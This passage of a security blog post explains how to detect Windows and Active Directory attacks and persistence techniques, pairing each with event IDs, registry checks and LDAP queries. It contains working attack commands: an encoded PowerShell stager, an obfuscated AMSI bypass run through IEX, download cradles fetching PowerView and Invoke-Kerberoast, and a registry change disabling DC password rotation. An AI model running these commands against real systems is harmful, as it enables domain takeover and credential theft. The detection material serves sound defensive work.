AVABFAG0ALgBOAGUAVAAuAEMAcgBlAEQAZQBOAFQAaQBhAEwAQwBhAGMASABlAF0AOgA6AEQARQBGAGEAVQBMAFQATgBlAHQAVwBvAHIASwBDAHIAZQBkAGUAbgBUAEkAYQBsAFMAOwAkAFMAYwByAGkAcAB0ADoAUAByAG8AeAB5ACAAPQAgACQAMgA5ADkALgBQAHIAbwB4AHkAOwAkAEsAPQBbAFMAeQBTAHQARQBNAC4AVABFAHgAVAAuAEUATgBjAG8AZABpAG4ARwBdADoAOgBBAFMAQwBJAEkALgBHAEUAVABCAHkAVABlAFMAKAAnAC0AdwAsAGIAPQB1ADcAfgBlAE4AaABNADIAJQBRAHAAVAAhADUAZAB7AFAAWwBsACMAPABnAEgAKgBtADYAXQAnACkAOwAkAFIAPQB7ACQARAAsACQASwA9ACQAQQBSAEcAcwA7ACQAUwA9ADAALgAuADIANQA1ADsAMAAuAC4AMgA1ADUAfAAlAHsAJABKAD0AKAAkAEoAKwAkAFMAWwAkAF8AXQArACQASwBbACQAXwAlACQASwAuAEMATwB1AG4AVABdACkAJQAyADUANgA7ACQAUwBbACQAXwBdACwAJABTAFsAJABKAF0APQAkAFMAWwAkAEoAXQAsACQAUwBbACQAXwBdAH0AOwAkAEQAfAAlAHsAJABJAD0AKAAkAEkAKwAxACkAJQAyADUANgA7ACQASAA9ACgAJABIACsAJABTAFsAJABJAF0AKQAlADIANQA2ADsAJABTAFsAJABJAF0ALAAkAFMAWwAkAEgAXQA9ACQAUwBbACQASABdACwAJABTAFsAJABJAF0AOwAkAF8ALQBiAFgATwByACQAUwBbACgAJABTAFsAJABJAF0AKwAkAFMAWwAkAEgAXQApACUAMgA1ADYAXQB9AH0AOwAkADIAOQA5AC4ASABFAGEAZABlAHIAUwAuAEEAZABkACgAIgBDAG8AbwBrAGkAZQAiACwAIgB1AHQAUgB3AFUARgBKAHQAQwBXAGgAbAB3AFkAdQA9AGsAQwAxAG8AdgBTAE0AYgBYADgAVwBBAGIAQQBvAEMAUgBTADQAKwAyAGcAQwA5AEwAbAAwAD0AIgApADsAJABEAGEAVABhAD0AJAAyADkAOQAuAEQATwBXAE4AbABPAGEAZABEAGEAVABhACgAJABTAEUAUgArACQAdAApADsAJABpAFYAPQAkAEQAQQB0AEEAWwAwAC4ALgAzAF0AOwAkAEQAYQBUAGEAPQAkAGQAQQBUAGEAWwA0AC4ALgAkAGQAYQB0AEEALgBsAEUATgBnAHQAaABdADsALQBKAG8ASQBOAFsAQwBoAGEAUgBbAF0AXQAoACYAIAAkAFIAIAAkAEQAYQBUAGEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==

Obfuscated PowerShell command

[sYstEm.TeXT.eNCoDINg]::UnicodE.GetsTRINg([SYsTEM.cONVERT]::FRoMBase64StrING("IwBSAGEAcwB0AGEALQBtAG8AdQBzAGUAcwAgAEEAbQBzAGkALQBTAGMAYQBuAC0AQgB1AGYAZgBlAHIAIABwAGEAdABjAGgAIABcAG4ADQAKACQAcwBwAHIAbAB5ACAAPQAgAEAAIgANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0AOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwANAAoAcAB1AGIAbABpAGMAIABjAGwAYQBzAHMAIABzAHAAcgBsAHkAIAB7AA0ACgAgACAAIAAgAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACkAXQANAAoAIAAgACAAIABwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEcAZQB0AFAAcgBvAGMAQQBkAGQAcgBlAHMAcwAoAEkAbgB0AFAAdAByACAAaABNAG8AZAB1AGwAZQAsACAAcwB0AHIAaQBuAGcAIABwAHIAbwBjAE4AYQBtAGUAKQA7AA0ACgAgACAAIAAgAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACkAXQANAAoAIAAgACAAIABwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEwAbwBhAGQATABpAGIAcgBhAHIAeQAoAHMAdAByAGkAbgBnACAAbgBhAG0AZQApADsADQAKACAAIAAgACAAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyACIAKQBdAA0ACgAgACAAIAAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGIAbwBvAGwAIABWAGkAcgB0AHUAYQBsAFAAcgBvAHQAZQBjAHQAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIABVAEkAbgB0AFAAdAByACAAYQB2AHYAYgB0AHMALAAgAHUAaQBuAHQAIABmAGwATgBlAHcAUAByAG8AdABlAGMAdAAsACAAbwB1AHQAIAB1AGkAbgB0ACAAbABwAGYAbABPAGwAZABQAHIAbwB0AGUAYwB0ACkAOwANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAAJABzAHAAcgBsAHkADQAKAA0ACgAkAGYAbgBiAHEAdQByAGYAIAA9ACAAWwBzAHAAcgBsAHkAXQA6ADoATABvAGEAZABMAGkAYgByAGEAcgB5ACgAIgAkACgAKAAnAOMAbQBzAO4ALgBkACcAKwAnAGwAbAAnACkALgBuAG8AcgBtAGEAbABpAHoARQAoAFsAYwBIAEEAcgBdACgANwAwACsANQA3AC0ANQA3ACkAKwBbAGMASABhAFIAXQAoADEAMQAxACkAKwBbAEMASABBAFIAXQAoADgAMAArADMANAApACsAWwBjAGgAQQBSAF0AKAA3ADYAKwAzADMAKQArAFsAYwBoAGEAcgBdACgANgA4ACkAKQAgAC0AcgBlAHAAbABhAGMAZQAgAFsAYwBIAEEAUgBdACgAOQAyACkAKwBbAGMAaABBAFIAXQAoADMANwArADcANQApACsAWwBDAGgAQQBSAF0AKABbAGIAeQBUAGUAXQAwAHgANwBiACkAKwBbAGMASABBAHIAXQAoAFsAYgBZAHQARQBdADAAeAA0AGQAKQArAFsAYwBIAEEAUgBdACgAMQAxADAAKQArAFsAQwBIAGEAUgBdACgAWwBCAFkAdABFAF0AMAB4ADcAZAApACkAIgApAA0ACgAkAGYAdwB0AHYAbgBxACAAPQAgAFsAcwBwAHIAbAB5AF0AOgA6AEcAZQB0AFAAcgBvAGMAQQBkAGQAcgBlAHMAcwAoACQAZgBuAGIAcQB1AHIAZgAsACAAIgAkACgAWwBDAEgAQQBSAF0AKAA2ADUAKwA0ADIALQA0ADIAKQArAFsAQwBIAEEAcgBdACgAMQAwADkAKQArAFsAYwBoAGEAUgBdACgAWwBCAFkAdABFAF0AMAB4ADcAMwApACsAWwBDAGgAYQByAF0AKABbAEIAeQBUAEUAXQAwAHgANgA5ACkAKwBbAGMAaABhAFIAXQAoAFsAQgBZAFQAZQBdADAAeAA1ADMAKQArAFsAYwBIAEEAcgBdACgAWwBCAFkAdABFAF0AMAB4ADYAMwApACsAWwBDAEgAYQByAF0AKAA0ADIAKwA1ADUAKQArAFsAQwBIAGEAUgBdACgAMQAxADAAKwA2ADcALQA2ADcAKQArAFsAYwBoAGEAcgBdACgANgA2ACoANQA5AC8ANQA5ACkAKwBbAEMASABBAHIAXQAoADQAOAArADYAOQApACsAWwBDAGgAYQBSAF0AKABbAEIAeQB0AGUAXQAwAHgANgA2ACkAKwBbAGMAaABhAHIAXQAoADEAMAAyACkAKwBbAEMAaABhAHIAXQAoAFsAQgBZAFQAZQBdADAAeAA2ADUAKQArAFsAQwBIAEEAcgBdACgANQArADEAMAA5ACkAKQAiACkADQAKACQAcAAgAD0AIAAwAA0ACgBbAHMAcAByAGwAeQBdADoAOgBWAGkAcgB0AHUAYQBsAFAAcgBvAHQAZQBjAHQAKAAkAGYAdwB0AHYAbgBxACwAIABbAHUAaQBuAHQAMwAyAF0ANQAsACAAMAB4ADQAMAAsACAAWwByAGUAZgBdACQAcAApAA0ACgAkAHMAbwB1AHEAIAA9ACAAIgAwAHgAQgA4ACIADQAKACQAagB6AGUAcwAgAD0AIAAiADAAeAA1ADcAIgANAAoAJABxAGwAZwBqACAAPQAgACIAMAB4ADAAMAAiAA0ACgAkAG4AZABhAGsAIAA9ACAAIgAwAHgAMAA3ACIADQAKACQAdgB4AHEAYwAgAD0AIAAiADAAeAA4ADAAIgANAAoAJABzAHQAdQB6ACAAPQAgACIAMAB4AEMAMwAiAA0ACgAkAGQAaABlAHoAegAgAD0AIABbAEIAeQB0AGUAWwBdAF0AIAAoACQAcwBvAHUAcQAsACQAagB6AGUAcwAsACQAcQBsAGcAagAsACQAbgBkAGEAawAsACsAJAB2AHgAcQBjACwAKwAkAHMAdAB1AHoAKQANAAoAWwBTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwAuAE0AYQByAHMAaABhAGwAXQA6ADoAQwBvAHAAeQAoACQAZABoAGUAegB6ACwAIAAwACwAIAAkAGYAdwB0AHYAbgBxACwAIAA2ACkA"))|iex

PowerShell Download with Net.WebClient

powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1')"

BITS Jobs Transfer

Start-Sleep -s 20; start-process PowerShell -windowstyle hidden -verb runas -argumentlist @('-command','start-bitstransfer "https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1" -Destination "C:\Users\MrEvil\Desktop\Invoke-Kerberoast.ps1"')

Result

At the sample results. We can see all the PowerShell activities at ‘Microsoft-Windows-PowerShell/Operational‘ or ‘Windows PowerShell‘.

The first one is looking at the AMSI Tampering technique. There are a few indicators that we can filter on, that may indicate a potential AMSI Tampering. Examples can include the string ‘EnableScriptBlockInvocationLogging‘ or the registry key, HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB’+’lockLogging’

The second example is encoded powershell, which looks like this:

Obfuscated PowerShell command.

PowerShell Download.

Active Directory

This section will primary focus on the different attacks and persistent in AD. As we may know, there are tons of different AD related attack vectors, but we won’t be able to cover all of them. The primary will focus on attacks that provides domain dominance or persistent.

  • DCSyncAttack

DCSync is a late-stage kill chain attack that allows an attacker to simulate the behavior of Domain Controller (DC) in order to retrieve password data via domain replication. In order to execute this attack, we need to have DS-Replicate-Get-Changes and DS-Replicate-Get-Changes-All on the Domain Root.

We have to look at the security event logs of a Domain Controller. The first thing to look at is event ID 4662 that contains the following string GUIDs.

  • {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}
  • {19195a5b-6da0-11d0-afd3-00c04fd930c9}

The second step is to correlate event ID 4662 with 4624. This can be done by looking at the Logon ID field and see if both have the same value. Once we have done that, we can see the from which machine a DCSync attack has occurred.

Result

At the final result, we can see that the attack was occurred from 10.1.0.8, which is a regular client workstation. We have to look at the ‘Source Network Address’ field and determine if the IP address belongs to a DC or not.

  • Fake Domain Controller machine accountPersistence

An attacker can create a fake machine account and change the userAccountControl value to 8192, and use it to perform DCSync. This is a great persistent, since most organizations won’t be able to notice the machine account.

The first part is to create the machine account and set a password on it. Once we have done that, we can start modifying the userAccountControl value to 8192. In order to do this, we need to have at minimum ‘DS-Install-Replica’ on the Domain Root Object, which by default. Only DA, EA, and Administrators have it.

The second thing is to authenticate as the fake machine account and use it to do a DCSync attack.

Result

At the sample result, we can see event ID 4742. This event ID indicates that a machine account was changed. As we can see here, the primaryGroupID attribute has been changed to 516. This is the ‘Domain Controllers’ group and the machine account has turned into a ‘Server Trust Account’, which is a sign that the machine is now a ”Domain Controller”.

One way to look for fake DC machine accounts is by running the following command:

([adsisearcher]'(&(servicePrincipalName=E3514235-4B06-11D1-AB04-00C04FC2DCD2*)(objectCategory=computer)(objectClass=computer))').FindAll()

This will list all the machine accounts that a special SPN, which is meant for the Domain Controllers. If we would compare the results of our output against the list of current DC’s. We can start comparing and see if there’s a machine account that does has the ‘SERVER_TRUST_ACCOUNT’ value, but don’t have the DRS RPC Interface GUID SPN attached to it.

However, it is good to know that once an attacker as DA or equivalent. The mentioned SPN can be easily set on the machine account to make it look more realistic.

This image has an empty alt attribute; its file name is image-116.png
  • Extracting NTDS.DIT remotely via WMI – Attack

Once an attacker has obtained DA or equivalent. They also can extract the the NTDS.DIT remotely by using a built-in management component called WMIC.

Result

When speaking from a forensics point of view. I have been having a hard time in finding this kind of activity in the logs.

  • Dumping NTDS.DIT with ntdsutil – Attack

Once an attacker has access to a Domain Controller locally. It can use the ntdsutil.exe for example to take a snapshot of the AD database and copy it to a new location. Personally, I don’t think attackers prefer this way of dumping the .DIT file. Since there are more efficient ways of extracting the NTDS.DIT file.

Result

At the sample result, we can see that event ID 637 has been generated in the Application logs.

  • AdminSDHolder – Persistence

AdminSDHolder is a container that exists in every Active Directory domain for a special purpose. The Access Control List (ACL) of the AdminSDHolder object is used as a template to copy permissions to all “protected groups” in Active Directory and their members.

Delegating permission on the AdminSDHolder can be used as persistence.

Result

At the sample result, we can see that event ID 4662 has been generated on a DC. At the ‘Object Name’ field, we can see the AdminSDHolder container.

  • Resource Based Constrained Delegation (RBCD) – Attack

An attacker with GenericWrite or equivalent on a machine account can get code execution on the targeted computer, which leads to elevation of privileges. Once an adversary has the rights to modify the msDs-AllowedToActOnBehalfOfOtherIdentity attribute of a machine account, let’s say a DC for instance. It means that code can be executed on a DC as SYSTEM.

First it starts with creating a fake machine account and modify the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of the targeted machine.

The second step is to start executing this attack by requesting a Kerberos TGT for the fake created machine account, so we could impersonate a specific user, which could be a Domain Admin for example.

The final step would be to execute a DCSync attack to get the NT hash of the KRBTGT account.

Result

At the sample result, we can see event ID 4662 on a Domain Controller. This event ID will have a special GUID in the properties, which is:

  • 3f78c3e5-f79a-46bd-a0b8-9d18116ddc79

This GUID is the display name for the LDAP attribute ‘msDS-AllowedToActOnBehalfOfOtherIdentity’

The second thing we can do is see if an attacker didn’t cleaned everything up, so we could run a LDAP query that looks for all the machine accounts that have a value at the specified attribute.

([adsisearcher]'(&(objectCategory=computer)(msDS-AllowedToActOnBehalfOfOtherIdentity=*))').FindAll()

Result

At the sample result, we can see that two machines have this attribute specified.

  • Shadow Credentials – Attack & Persistence

An security researcher discovered a great way to takeover user & machine accounts in Active Directory by effectively adding alternative credentials to an account. In order to obtain to request a TGT for the targeted user & machine account. The scary thing is that even when a user or machine changes their password. The alternative credentials would still persist.

However, there is something to keep in mind. In order for an adversary to execute this attack. It will require GenericWrite or equivalent, so the attacker could modify the msDS-KeyCredentialLink attribute on a user or machine account to request a TGT of it. Well, that’s been said. There are also a few other requirements:

  • At least one Windows Server 2016 Domain Controller
  • A digital certificate for Server Authentication installed on the DC
  • Windows Server 2016 Functional Level in AD
  • Compromise an account with delegated rights to write to the msDS-KeyCredentialLink attribute of the target object

Here is an example of executing this attack on a DC machine account.

Result

If we would run the following LDAP query:

([adsisearcher]'(&(msDS-KeyCredentialLink=*))').FindAll()

At the sample result, we can see that two machine account with a value at the specific attribute. Verify if the targeted object is legitimately using Windows Hello for Business. If that is not the case, it might being a backdoor.

  • Disable automatically password change on DC machine account – Persistence

Once an attacker has elevated to being a DA or equivalent. It can perform a DCSync attack to obtain the NT hash of a DC machine account. DC machine accounts can do DCSync as well, as we discussed before. However, an machine account rotates by default, their password every 30 days.

An attacker could disable password rotation on a DC machine account, so it can leverage the same NT hash over and over again, without worrying that it doesn’t work anymore.

reg ADD HKLM\SYSTEM\CurrentControlSet\services\Netlogon\Parameters /v DisablePasswordChange /t REG_DWORD /d 1 /f

If we now run the following command to see if the automatic password change has been disabled.

reg query HKLM\SYSTEM\CurrentControlSet\services\Netlogon\Parameters /v DisablePasswordChange

Result

At the sample result, we can see that the password of the DC03$ won’t change automatically anymore. This allows an attacker to come back and just use the same NT hash to own the entire environment again. Look out for the “DisablePasswordChange” value with “0x1”.

  • Enable DSRM Admin (Remote) on Domain Controller – Persistence

The Directory Service Restore Mode (DSRM) account is a break-glass account for Active Directory. The password of the DSRM is set, when a Domain Controller is promoted.

An attacker can use this account to logon to a Domain Controller over the network as a local administrator. The first thing is to allow the DSRM account being able to logon remotely. This can be done by adding a new value to a registry key.

The second step is to dump the local SAM database of a Domain Controller.

Last thing the attacker could do is use PtH and access to the targeted DC.

Result

To see if the DSRM account can logon remotely over the network. We can query a registry and see if a value has been set to make this possible.

Command

reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa /v DsrmAdminLogonBehavior

Result

At the sample result, we can see that it is really the case. Because the value ‘DsrmAdminLogonBehavior’ exists.

  • Modifying security descriptors for remote WMI access – Persistence

An attacker can grant themselves WMI access to a machine, which can be a Domain Controller for example. This allows an attacker to run commands via WMI against a DC.

Result

At the sample result, we can see that an ACE has been delegated on the Root/CIMV2 namespace with full rights.

  • Enable PowerShell Remoting on DC – Persistence

Once an attacker has access to a DC. There are different ways to persist as we have discussed. One of them is to enable PowerShell remoting for an backdoor account, so it can interact remotely with the targeted DC.

Let’s say that we already got domain dominance and decided to dump the NTDS.DIT file in the Temp folder of a Domain Controller.

Now we can login on our backdoor account and use PowerShell remoting to make a copy of the NTDS.DIT and the SECURITY & SYSTEM hives.

Result

At the sample result, we can see that MrEvil has the rights to initiate a PowerShell remoting session with DC02. An ACE with the rights to initiate a PowerShell remoting to a DC doesn’t immediately indicate, that it is malicious. It may have been used for legitimate use-cases, so try to gather context first, before making assumptions.

  • Retrieving the hashes of SAM, SECURITY, and SYSTEM Hives (Remotely) – Persistent

An attacker can create a backdoor by modifying the security descriptor of a registry key that exists on a DC to get the SAM, SYSTEM, and SECURITY Hives. This allows an attacker to grab remotely the NT hash of a DC machine account and the hashes that are associated with the local accounts.

Now we can extract the NT hash of a DC machine account and all the local accounts that are stored in the SAM database.

Result

There are different registry keys that will be modified, so looking at all of them is not needed. We can verify this backdoor by looking at the following two registry keys on a DC:

  • HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\Data
  • HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\JD

The second step would be looking at all the ACEs with FullControl permissions.

  • SpoolSample via Unconstrained Delegation – Attack

Servers that are configured for Unconstrained Delegation are valuable targets for attackers to abuse. Once a server is configured for Unconstrained Delegation and a Domain Controller has Print Spooler enabled. It can trigger the SpoolSample to let a DC authenticate against the server, which will leave it’s TGT behind. We can then use the TGT of the DC machine account to compromise the environment.

Result

At the sample result, we can see that event ID 4624 has generated on the Unconstrained Delegation server. This event also displays a DC machine account in the property field, which means that a DC has authenticated.

  • Kerberos Golden Ticket – Persistence

Golden Ticket attack is a type of attack in which an adversary gains control over an Active Directory Key Distribution Service Account (KRBTGT), and uses that account to forge valid Kerberos Ticket Granting Tickets (TGTs). 

Result

It’s very hard to find this in the logs.

  • From DnsAdmins to Domain Admin – Attack

By default, DnsAdmins has GenericAll on the MicrosoftDNS container. It is publicly known that DnsAdmins can escalate their privileges to SYSTEM on a DC, and then become DA.

Every ACE with GenericWrite or equivalent on the MicrosoftDNS container can inject a DLL in the DNS service to run code as SYSTEM on a DC.

The below looks promising and suggests the request to load our malicious DLL was successful:

Result

At the sample result, we can look at the DNS-Server-Service logs on the DC and see if we have an event ID 150 that tells us, someone attempting to load a DLL.

We can check the following registry on a Domain Controller and see if the value ‘ServerLevelPluginDll’ exists in the following registry key:

HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters

  • Copying a GPO and restore it reverse – Attack & Persistence

Accounts that are a member of the Backup Operators and Server Operators within AD are the ”hidden” Domain Admins. They both have the SeBackupPrivilege and SeRestorePrivilege privileges, which allows them to make a copy of a GPO, let’s say the one that is linked to a DC, tweak some settings, and then restore it reverse.

Here we can see that we have an ACE that’s a member of Backup Operators.

We first started with copying the Default Domain Controllers Policy.

At this part, we decided to tweak some settings. We granted ourselves SeTakeOwnerShipPrivileges in AD. This allows an ACE to take ownership of every object within AD.

The last part was to restore the GPO reversed.

Result

If we now look at the Default Domain Controllers Policy, we can see that Alice has ‘Take ownership of files or other object’ in AD. Make sure to review all the user right assignments and other settings of GPOs that are linked to a Domain Controller.

We can find this in the logs of a Domain Controller by filtering on event ID 4672 at the Security event logs. Look for the privileges that have been assigned to an ACE. However, keep in mind that an attacker can do much more damage when it has write permission to a GPO. This is one of the examples.

  • Abusing Group Policies Permissions – Attack & Persistence

An ACE with Write permissions on a GPO that is linked to Domain Controllers or domain wide has the ability to modify that GPO and elevate their privileges.

Here we can see there is an ACE with Write permission on a GPO that is linked to a Domain Controller. This is the Default Domain Controllers Policy.

GPO’s are stored partly in an Active Directory database and partly in the replicated Sysvol folder shared by Domain Controllers, which we can see here:

We can then modify the GPO settings and add ourselves to the local Administrators of a machine for example, which will be in the case. The local Administrators group of a DC. This is equivalent to being a Domain Admin.

Voila, we’re now a member of the local Administrators group of a DC.

Ok, let’s say that instead of the Default Domain Controllers Policy. The attacker would have Write permissions to edit the Default Domain Policy.

As we discussed previously, GPOs are stored in SYSVOL and this folder is replicated to other Domain Controllers within the same domain.

We could basically do the same trick, but this time. We would add ourselves to the local Administrators on every machine in the domain, because the Default Domain Policy is configured domain wide.

Usually, it takes between 90 and 120 minutes for a new GPO to be applied, but once it has been applied. We can see our ACE being added to the local Administrators group of a machine.

At the result, we can see our ACE being a member of the local Administrators group of a machine. We should review GPO settings closely that are deployed on machines.

The same thing can be done as well with an tool called ‘SharpGPOAbuse’, which makes the process much easier. At this example, we are using SharpGPOAbuse to add ourselves to the local Administrators group via the Default Domain Controllers Policy.

At the sample result, we can see that we have been added to the local Administrators group of the Domain Controllers.

Result

We can look at event ID 4662 on a Domain Controller, which indicates that a GPO has been modified. This includes the GUID of the GPO.

  • User Constrained Delegation Backdoor – Persistence

An attacker can create an (backdoor) account and delegate it against an exploitable service (e.g. LDAP/dc.contoso.com). This allows an attacker to use the created backdoor account to request a TGS of LDAP/dc.contoso.com through the S4U2Self extension. In other words, this allows an attacker to have full domain dominance.

We started with creating our backdoor account in Active Directory.

The second step was requesting a delegation TGT of our backdoor account.

The third step was to request a TGS for the Administrator account in AD, which allows us to access the LDAP/dc.contoso.com service. Why the LDAP service? Well, this allows us to do a DCSync attack. Other services could be chosen as well, such as CIFS or HOST for example.

The final step was to execute a DCSync attack to get the NT hash of the KRBTGT account.

Result

We can filter on event ID 4738 in the Security event logs of a Domain Controller. We can then look if the ‘msDS-AllowedToDelegateTo‘ attribute has been modified. It’s important to look if an account could impersonate a service that is associated with a Domain Controller. This rarely happens and should raise alarms.

We can run a LDAP query to retrieve all the accounts that support this configuration.

([adsisearcher]'(msDS-AllowedToDelegateTo=*)').FindAll()
  • Machine Constrained Delegation – Persistence

SeEnableDelegationPrivilege is a user right that is controlled within the Local Security Policy of a Domain controller and is managed through Group Policy.

Misuse of the SeEnableDelegationPrivilege user right could allow unauthorized users to impersonate other users on the network. An attacker could exploit this privilege to gain access to network resources and make it difficult to determine what has happened after a security incident.

Here we can see that we have an ACE with SeEnableDelegationPrivilege

We are now going to abuse this privilege in practice. To keep it short, but in order to abuse this configuration. We need to have SeEnableDelegationPrivilege and GenericWrite or equivalent on a user/machine account. By default, only Domain Admins and equivalent have SeEnableDelegationPrivilege.

  1. By default, every authenticated user has the rights to create up to 10 machine accounts in AD. This value is set on the Domain Object and can be queried by looking at the ‘ms-DS-MachineAccountQuota’

2. We are now going to create a fake machine account in AD with the password that we know.

3. We did set a password on our fake machine account and the second step is to convert the password in an NT hash.

4. Now we are going to configure our fake machine account to allow it to delegate to the LDAP service of a Domain Controller (e.g. LDAP/dc.contoso.com). Keep in mind that we need to have ‘Write’ permission on our created machine account or otherwise it wouldn’t work.

5. Now we have to modify the userAccountControl value of our created fake machine account to 16781312. This value is equals to “Use any authentication protocol” delegation and it means that the service account is allowed to delegate without being required to prove a user authenticated to it.

6. We are now going to request a delegation TGT of our created fake machine accounts.

6. With the requested TGT, we can start initiating the S4U2Self, which is an extension that allows a service to obtain a service ticket on behalf of a user. The S4U2proxy extension will allow a service to obtain a service ticket to another service on behalf of a user, which will be in this the case for the LDAP service.

7. The final step is to leverage the exploitable LDAP service of a DC to execute a DCSync attack.

Result

At the sample result, we can see that event ID 4672 has been generated. This permission contains the ‘SeEnableDelegationPrivilege‘ privilege, which has been assigned to Edward.

Since we have modified a machine account. It will also generate event ID 4742. Here we can see that the UAC value has been modifed to ‘Trusted to Authenticate for Delegation‘.

  • Modifying security descriptor of Windows Service

An attacker can modify the security descriptor of an existing service that runs as LOCAL SYSTEM. This allows them to modify the so-called ‘binPath’ of a service. binPath is a mandatory parameter that specifies the path to the executable.

  1. First, we start with modifying the service that we would like to persist in. In this example, it will be the Dfs service on a Domain Controller. We are modifying the security descriptor of the service to grant the user ‘b4ckdo0r’ the rights to control it.

2. The second step is to make use our persistence. What we could do is abuse this service of a DC and add ourselves to the local Administrators group of a DC.

Result

At the sample result, we can see that our backdoor account has been added to the local Administrators group of a DC.

  • ACE with DNSAbuse Permissions – Persistence

An attacker can modify the MicrosoftDNS container in AD to inject a .dll into the DNS.exe process of a Domain Controller. In order to inject a .dll into the dns.exe process of a DC. An ACE needs to have at GenericWrite or equivalent on the specified container. By default, this is only for DnsAdmins, Domain Admins, Enterprise Admins, and Administrators.

Here we are modifying the MicrosoftDNS container to add our backdoor account with the required permission. We have also modified the security descriptor of the DNS service on a DC. This service runs as SYSTEM, so an attacker could modify that service as well to elevate privileges.

Result

At the sample result, we can see that an ACE has been delegated on the MicrosoftDNS container. Every ACE that is not a Tier-0 should be removed.

  • ACE with DCSync Privileges – Persistence

An attacker can add an ACE to the Domain Object with the required privileges to do DCSync. This allows an attacker to use the backdoor account with DS-Replicate-Get-Changes & DS-Replicate-Get-Changes-All the replicate credentials within the domain.

Result

At the sample result, we can see that an ACE has been delegated on the Domain Object. Every ACE with GenericAll or equivalent (e.g. WriteDacl, WriteOwner, AllExtendedRights) should be treated as a Tier-0.

Summary

This was a brief overview of some attacks and persistence against Windows and Active Directory. We first started with the common things against Windows, and went then to Active Directory. The majority of attacks and persistence that have been discussed are provided in such a way, that once an attacker decides to come back. They still can get domain dominance. However, keep in mind that this list is not everything. There are tons of ways to persist or attack AD.

Being aware of the different persistence can be helpful, because it provides a better overview of the different possibilities. There are tons of ways to create persistence, so despite that you may have discovered 2 persistence. There may have been 1 left, which opens the door again for attackers. This is why being aware of the small little details can make the (big) difference.

Reference

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s